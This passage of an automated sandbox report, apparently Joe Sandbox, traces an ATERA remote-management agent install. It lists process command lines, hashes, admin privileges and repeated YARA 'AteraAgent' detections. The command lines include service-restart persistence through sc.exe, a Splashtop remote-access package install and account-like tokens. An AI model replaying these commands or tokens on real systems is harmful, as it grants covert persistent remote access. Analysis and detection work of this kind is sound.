                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:25
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "927926aa-335a-417d-b375-138a84c77d14" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000LlkxmIAB
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x2696e850000
                                                                                                                                                                                                                                                                                                                                  File size:177'712 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:31DEF444E6135301EA3C38A985341837
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1970238618.000002696E998000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1969655757.0000026900083000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1970238618.000002696E990000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1970116257.000002696E940000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1970238618.000002696EA14000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1970238618.000002696E9CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1969655757.0000026900073000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000016.00000002.1969655757.0000026900001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:25
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:26
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x16bd0c20000
                                                                                                                                                                                                                                                                                                                                  File size:145'968 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2916644902.0000004DD77F5000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2974355709.0000016BEA29C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1C42000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2935401771.0000016BD0D6D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD21E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1E96000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD161C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2972325371.0000016BE9F09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2977086603.0000016BEA395000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1BEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD2252000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD15B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD2254000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1C7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2935178142.0000016BD0CD0000.00000004.00000020.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1C14000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2935401771.0000016BD0D4D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD20A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1C5C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2974355709.0000016BEA23D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2974355709.0000016BEA204000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD2175000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1C55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1C21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1BD8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1C05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1DC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2972325371.0000016BE9E74000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2974355709.0000016BEA2A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2974355709.0000016BEA295000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1C3A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2935401771.0000016BD0D96000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2978322929.0000016BEA6E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2938112807.0000016BD0FC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2972325371.0000016BE9E4D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1F78000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD21EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2974355709.0000016BEA2CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1D78000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2935401771.0000016BD0D10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:26
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c5700000
                                                                                                                                                                                                                                                                                                                                  File size:72'192 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:26
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:27
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "e24a5d52-0d16-40c8-ae18-af372363c3dc" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000LlkxmIAB
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x2e94e950000
                                                                                                                                                                                                                                                                                                                                  File size:177'712 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:31DEF444E6135301EA3C38A985341837
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2179995487.000002E94EAE1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2184094049.000002E94F6BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2206158038.000002E967EE6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2184094049.000002E94F5F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2179995487.000002E94EB24000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2198254091.000002E967C21000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2179995487.000002E94EAA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2184094049.000002E94F68C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2179995487.000002E94EADB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2184094049.000002E94F651000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2181419382.000002E94ED90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2184094049.000002E94F523000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2184094049.000002E94F64C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2184094049.000002E94F491000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2184094049.000002E94F6BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2184094049.000002E94F72A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:27
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:28
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff78e390000
                                                                                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2089827549.000002332A61B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000003.1992596648.000002332A8C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2089827549.000002332A633000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2089827549.000002332A610000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2090008634.000002332A8A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:28
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:28
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cscript.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7666d0000
                                                                                                                                                                                                                                                                                                                                  File size:161'280 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001F.00000002.2086909400.0000022D4CA70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:29
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\sppsvc.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\sppsvc.exe
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6141d0000
                                                                                                                                                                                                                                                                                                                                  File size:4'630'384 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:320823F03672CEB82CC3A169989ABD12
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:30
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "c7045ac8-f19b-40af-bcd9-2d8df64c2185" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIn0=" 001Q300000LlkxmIAB
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x21719510000
                                                                                                                                                                                                                                                                                                                                  File size:74'288 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:749C51599FBF82422791E0DF1C1E841C
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Yara matches:
